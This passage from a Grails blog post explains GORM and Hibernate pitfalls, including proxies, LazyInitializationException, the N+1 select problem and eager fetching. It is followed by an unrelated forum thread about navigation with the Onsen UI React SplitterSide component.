exact same object. So when we call Pet.get(1), Hibernate gives us the proxy. The reason the corresponding assertion succeeds is that GORM automatically unwraps the proxy. The same happens for findBy*() and any other queries that can only return a single instance. However, GORM does not unwrap proxies for the results of list(), findAllBy*(), and other queries that can return multiple results. So Pet.list()[0] returns us the unwrapped proxy instance. If the Person isn’t fetched first, Pet.list() will return the real instances: the proxy isn’t in the session this time, so the query isn’t obliged to return it. You can protect yourself against this problem in a couple of ways. First, you can use the dynamic instanceOf() method instead of the instanceof operator. It’s available on all GORM domain instances and is proxy-aware: Pet.get(1).instanceOf(Dog). Second, declare variables using def rather than static domain class types, otherwise you may see class cast exceptions. So, rather than Person p = Person.get(1) Dog dog = Pet.list()[0] // Throws ClassCastException! use def p = Person.get(1) def dog = Pet.list()[0] With this approach, you will still be able to access any properties or methods that are specific to Dog, even though you’re working with a proxy. It has to be said, GORM does an amazing job of shielding developers from proxies. They only rarely leak through to your application code, particularly with more recent versions of Grails. Still, some people will run into issues with them so it’s useful to be aware what the symptoms are and why they occur. I showed in the last example how the behaviour of the session combined with lazy loading can produce some interesting results. That combination also lies behind a more common error: the org.hibernate.LazyInitializationException. Lazy loading and the session As I’ve already mentioned, when you have a lazily loaded relationship Hibernate has to execute an extra query if you then want to navigate that relationship at a later date. In the normal course of events this isn’t a problem (unless you’re worried about performance) since Hibernate does it transparently. But what happens if you try to access the relationship in a different session? Let’s say you have loaded the Author instance with ID 1 in a controller action and stored it in the HTTP session. At this point, no code has touched the books collection. On the next request, the user goes to a URL that corresponds to this controller action: class MyController { def index = { if (session.author) { render "Author ${session.author.name} has written the books: ${session.author.books*.title}" else { render "No author in session" } } ... } The intention here is that if our HTTP session contains an author variable, the action renders the titles of that author’s books. Except in this case it doesn’t. It throws a LazyInitializationException instead. The problem is that the Author instance is what we call a detached object. It was loaded in one Hibernate session, but then that session was closed at the end of the request. Once an object’s session is closed, it becomes detached and you cannot access any properties on it that will result in a query. “But a session is open in my action, so why the problem?” I hear you cry. That’s a good question. Unfortunately, this is a new Hibernate session and it doesn’t know anything about our Author instance. Only when the object is explicitly attached to the new session will you be able to access its lazy associations. There are several techniques for doing just that: def author = session.author // Re-attach object to session, but don't sync the data with the database. author.attach() // Re-attach object, but merge any changes with the data in the database. // You *must* use the instance returned by the merge() method. author = author.merge() The attach() method is useful in cases where the domain instance is unlikely to have changed in the database since the detached object was retrieved. If that data may have changed, then you’ll have to be careful. Check the Grails reference guide for information on the behaviour of merge() and refresh(). Now If you get a LazyInitializationException, you’ll know that it’s because your domain object is not attached to a Hibernate session. You’ll also have a good idea of how to resolve the issue, although I’ll introduce another approach to solving the problem soon. Before I get to that, I want to have a look at another classic side effect of lazy initialisation: the N + 1 select problem. N + 1 selects Let’s go back to the author/book/location example from earlier in the article. Imagine we have four authors in the database and we run the following code: Author.list().each { author -> println author.location.city } How many queries will be executed? The answer is five: one to get all the authors, and then one per author to retrieve the corresponding location. This is known as the N + 1 select problem and it’s very easy to write code that suffers from it. The example above certainly looks harmless enough at first glance. During development this isn’t really a problem, but executing so many queries will harm the responsiveness of your application when it’s deployed to production. Because of this, it’s a good idea to analyse the database usage for your application before it’s opened up to end users. The simplest approach is to enable Hibernate logging in grails-app/conf/DataSource.groovy, which ensures that all queries are logged to stdout: dataSource { ... loggingSql = true } You can of course enable it on a per-environment basis. An alternative approach is to use a special database driver like P6Spy that intercepts the queries and logs them. So how do you avoid these extra queries? By fetching associations eagerly rather than lazily. This approach also solves the other issues related to lazy loading that I’ve mentioned. Being eager GORM allows you to override the default lazy loading behaviour on a per-relationship basis. For example, we can configure GORM to always load an author’s location along with the author via this mapping: class Author { String name Location location static hasMany = [ books: Book ] static mapping = { location fetch: 'join' } } In this case, not only is the location loaded with the author, but it’s retrieved in the same query using a SQL join. So this code: Author.list().each { a -> println a.location.city } will only result in a single query. You can also use the lazy: false option in place of fetch: ‘join’ but that will result in an extra query to load the location. In other words, the association is loaded eagerly, but with a separate SQL select. Most of the time you’ll probably want to use fetch: ‘join’ to minimise the number of queries that are executed, but sometimes it can be the more expensive approach. It really depends on your model. There are other options, but I won’t go into them here. They are fully documented in sections 5.3.4 and 5.5.2.8 of the Grails user guide if you want to know more (although I would wait for the 1.3.4 release of Grails, which will come with some important documentation updates). The downside to configuring eager loading in the domain class mapping is that the association will always be loaded eagerly. But what if you only need that information occasionally? Any page that just wants to display an author’s name will be slowed down unnecessarily because the location must also be loaded. The cost may be low for a simple association like this, but it will be greater for collections. That’s why you also have the option to eagerly load associations on a per-query basis. Queries are context sensitive, so they’re the ideal place to specify whether particular associations should be eagerly loaded or not. Let’s say we’ve reverted to the default behaviour for Author and now we want to get all authors and display their cities. In this context, we obviously want to retrieve the locations when we get the authors. Here’s how: Author.list(fetch: [location: 'join']).each { a -> println a.location.city } All we’ve done is add a fetch argument to the query with a map of association names -> fetch modes. If the code also displayed the titles of the authors’ books, we’d add the books association to the map too. The dynamic finders support the exact same fetch option: Author.findAllByNameLike("John%", [ sort: 'name', order: 'asc', fetch: [location: 'join'] ]).each { a-> ... } We can also achieve the same thing with criteria queries: def authors = Author.withCriteria { like("name", "John%") join "location" } All of the above applies to one-to-many relationships too, but there are some extra considerations you need to take into account. Eager loading of one-to-manies I said above that you would typically want to use joins when eagerly fetching associations, but this rule of thumb doesn’t work well with one-to-many relationships. To understand why, consider this query: Author.list(max: 2, fetch: [ books: 'join' ]) In all likelihood, this will return only one Author instance. That’s probably not the behaviour you expect or want. So what’s happening? Under the hood Hibernate is using a left outer join to fetch the books for each author. That means you get duplicate Author instances: one for each book the author is associated with. If you don’t have the max option there, you won’t see those duplicates because GORM removes them. But the trouble is the max option is applied to the result before the duplicates are removed. So in the example above, Hibernate only returns two results, both of which are likely to have the same author. GORM then removes the duplicate and you end up with a single Author instance. This problem occurs both with the domain class mapping configuration and criteria queries. In fact, criteria queries won’t by default remove the duplicates from the results! There’s only one sensible solution to this confusion: always use the ‘select’ mode for one-to-many relationships. For example, in domain mappings use lazy: false: class Author { ... static hasMany = [ books: Book ] static mapping = { location fetch: 'join' books lazy: false } } In queries, use the appropriate setting depending on whether you’re using dynamic finders or criteria queries: import org.hibernate.FetchMode Author.list(fetch: [ books: 'select' ]) Author.withCriteria { fetchMode "books", FetchMode.SELECT } Yes, you will end up with an extra query to fetch the collection, but it’s only one and you gain consistency and simplicity. If you find you really need to reduce the number of queries, then you can always fall back to HQL. Apart from the situation with one-to-manies, eager fetching in GORM is straightforward and if you follow the principle of using the ‘select’ fetch mode for one-to-manies, the same applies to those. The main effort goes into profiling an application’s database access to determine where associations should be fetched eagerly or specifically with a join. Just beware premature optimisation! Wrapping up As you’ve seen, lazy loading of associations raises a variety of issues, particularly when combined with the Hibernate session. Despite those issues, lazy loading is an important feature that remains a sensible default for object graphs. The problems that tend to crop up are easily identified once you know about them and are typically easy to solve too. And if nothing springs to mind, you can always fall back to judicious use of eager loading. All that said, as the Grails version number has gone up, users have progressively become less and less likely to come across these issues. When you consider what’s happening behind the scenes with Hibernate, that’s a pretty impressive trick!
https://spring.io/blog/2010/07/28/gorm-gotchas-part-3/
CC-MAIN-2020-16
refinedweb
2,788
64.2
SplitterSide The SplitterContent element is used as a child element of Splitter. It contains the main content of the page while SplitterSide contains the list. Hi, You provide a very nice interactive tutorial. Currently I am working on an app that contains a side menu. The setup is similar to the example provided in the tutorial (the navigation icon is located top-left). It is not clear to me how I should construct the navigation from the menu. Since this feature is not implemented in the tutorial for React, I was hoping that you can provide one. Use case: - User opens the side menu - Clicks a menu item - The contents of the SplitterContent component changes to that associated with the menu item that was clicked; the menu item icon should remain available in the top left corner Many thanks Regards, Jan - munsterlander 侍 last edited by @JanvB That functionality is missing in the tutorial and I will try to add it later. Here is a working core example: In short, you use the load method to push a page to the navigation stack. @munsterlander: thank you. I managed to do it differently with three components (parent and 2 child components ( <SideMenu> and <Navigator> ). In short: {/* Parent component with initialroute */} class Main extends Component { constructor( props ){ super( props ); this.state = { isOpen: false, route: { component: Home, key: "HOME_PAGE" } }; this.hide = this.hide.bind( this ); this.setView = this.setView.bind( this ); this.renderPage = this.renderPage.bind( this ); } ... renderPage( route, navigator ){ return <Page renderToolbar={ this.renderToolbar.bind( this ) } renderFixed={ this.renderFixed.bind( this ) } > <this.state.route.component key={ this.state.route.key } navigator={ navigator } { ...route.props } /> </Page> } ... render(){ return ( <Splitter> <SplitterSide side='left' isOpen={ this.state.isOpen } onClose={ this.hide.bind( this ) } onOpen={ this.show.bind( this ) } {/* Other options */} > <Page> <SideMenu hide={ this.hide } setView={ this.setView } /> </Page> </SplitterSide> <SplitterContent> <Navigator renderPage={ this.renderPage } initialRoute={ this.state.route } /> </SplitterContent> </Splitter> Then in the <SideMenu> component you can alter the parents state via the setView function (accessible via this.props.setView): { /* Each menu-item has an id ('idx' ). MetuData is an array of objects defined outside of the React component: const menuData = [ { index: 1, title: "Home", key: "HOME_PAGE", component: Home }, { index: 2, title: "Page1", key: "PAGE1", component: Page1 }, { index: 3, title: "Page2", key: "PAGE2", component: Page2 }, { index: 4, title: "Page3", key: "PAGE3", component: Page3 } ]; The child component manages the parent state (in this example you import the Pages1/2/3 components in the <SideMenu> component). */ } export class SideMenu extends Component { constructor( props ){ super( props ); this.setRoute = this.setRoute.bind( this ); } setRoute( idx ){ const { component, key } = menuData.find( ( item ) => item.index === idx ); this.props.hide(); return this.props.setView( component, key ); } ... Because of the state changes, React will rerender the parent component. It is probably a more React-style way of implementing this. (I already had this, it wasn’t working because I didn’t have to latest version of the react-onsenui package installed - there was an issue with the <Navigator> component:) swipeTargetWidthdescription seems erroneous (duplicated description from width?) warning.js:36 Warning: Failed prop type: Invalid prop swipeTargetWidthof type stringsupplied to SplitterSide, expected number. in SplitterSide SplitterSide prop swipeTargetWidthshould mostly be declared as PropTypes.oneOfType([ PropTypes.string, PropTypes.number, ]), or description above be corrected. - misterjunio Onsen UI last edited by
https://community.onsen.io/topic/821/splitterside/?page=1
CC-MAIN-2021-25
refinedweb
546
51.44